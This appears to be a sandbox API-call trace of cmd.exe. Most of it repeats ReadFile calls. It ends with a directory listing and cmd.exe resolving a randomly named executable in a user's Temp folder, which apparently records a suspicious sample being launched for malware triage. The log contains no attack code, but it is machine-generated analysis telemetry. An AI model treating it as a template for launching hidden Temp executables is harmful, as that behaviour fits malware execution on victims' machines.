[0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.209] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, 
lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.210] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, 
lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.211] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: 
lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.212] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, 
lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.213] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.214] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, 
lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile 
(in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 
[0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, 
lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.240] _close (_FileHandle=4) returned 0 [0115.240] FindNextFileW (in: hFindFile=0x80f68, lpFindFileData=0x2aee48 | out: lpFindFileData=0x2aee48) returned 0 [0115.241] GetLastError () returned 0x12 [0115.241] FindClose (in: hFindFile=0x80f68 | out: hFindFile=0x80f68) returned 1 [0115.241] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0115.278] _close (_FileHandle=3) returned 0 [0115.278] GetConsoleTitleW (in: lpConsoleTitle=0x2af2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.278] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe\"")) returned 0xffffffff [0115.278] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0115.278] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0115.278] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0115.278] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0115.278] _wcsicmp (_String1="\"C", 
_String2="COPY") returned -65 [0115.278] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0115.278] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0115.279] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0115.279] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0115.279] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0115.279] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0115.279] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0115.279] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0115.279] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0115.279] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0115.279] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0115.279] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0115.279] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0115.279] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0115.279] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0115.279] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0115.279] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0115.279] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0115.279] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0115.279] 